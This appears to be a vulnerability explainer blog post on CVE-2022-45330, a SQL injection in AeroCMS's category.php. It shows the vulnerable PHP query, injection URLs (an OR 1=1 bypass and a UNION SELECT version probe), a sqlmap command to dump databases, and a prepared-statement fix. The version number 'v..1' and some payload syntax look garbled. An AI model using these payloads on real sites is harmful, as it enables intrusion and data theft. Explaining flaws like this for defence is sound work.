CVE-2022-45330 - AeroCMS v..1 SQL Injection Vulnerability Explained

When it comes to securing web applications, SQL Injection (SQLi) is one of the oldest–and still most dangerous–types of vulnerabilities. In this post, we’re going to break down CVE-2022-45330, a SQL Injection vulnerability found in AeroCMS v..1. We’ll walk through what this flaw is, show example code, review an exploit, and point you to the original resources.

What is AeroCMS?

AeroCMS is a simple open-source Content Management System (CMS) written in PHP. It’s meant for small sites and personal projects.

The Vulnerability: SQL Injection via category.php

In version ..1 of AeroCMS, the category.php file takes a parameter from the user called Category. Due to missing input validation, an attacker can use this parameter to send SQL code to the database–leading to SQL Injection.

Here’s the vulnerable PHP code snippet from category.php

<?php
// category.php

include('config.php');

if(isset($_GET['Category'])) {
    $category = $_GET['Category'];
    // Vulnerable query
    $sql = "SELECT * FROM posts WHERE category = '$category'";
    $result = mysqli_query($conn, $sql);
    //... more code
}
?>

Notice that the user input $category is put directly into the SQL query. There is no sanitization or prepared statement. That’s a classic SQLi mistake.

What Does This Mean?

It means that an attacker can change the behavior of the SQL query by adding malicious SQL code in the Category parameter.

Suppose the attacker goes to

http://example.com/category.php?Category='; OR 1=1--+

The resulting SQL query becomes

SELECT * FROM posts WHERE category = '' OR 1=1--+'

--+ comments out the rest of the query.

This will return all posts in the database, regardless of the intended category.

Extracting Confidential Data

If the attacker wants to dump other information (if error messages reveal output, or with a blind approach) it can be even worse. For example, to enumerate database version:

http://example.com/category.php?Category='; UNION SELECT 1,2,@@version--+

The specific payload may vary based on the structure of the original query and the schema.

Here’s a simple exploit using sqlmap (an open source SQLi tool)

sqlmap -u "http://example.com/category.php?Category=1"; --dbs

This tells sqlmap to scan the Category parameter for injection and dump the list of databases.

Use Prepared Statements (with parameterized queries)

$stmt = $conn->prepare("SELECT * FROM posts WHERE category = ?");
$stmt->bind_param("s", $category);
$stmt->execute();

This binds the input and ensures it is always treated as a string, not as part of the SQL command.

2. Escape Inputs: At the very least, use mysqli_real_escape_string(), but prepared statements are preferred.

References

- NVD Entry for CVE-2022-45330
- Exploit Database Reference
- Original GitHub Issue
- SQL Injection Explained (OWASP)

In Summary

CVE-2022-45330 is a real-world example of how quickly an attacker can break into a website with improper input handling. If you’re building with PHP (or any other language that interacts with a database), always use prepared statements. AeroCMS v..1 is vulnerable–make sure to patch or remove this software if you’re using it in production.

Timeline

Published on: 11/22/2022 21:15:00 UTC
Last modified on: 11/23/2022 16:04:00 UTC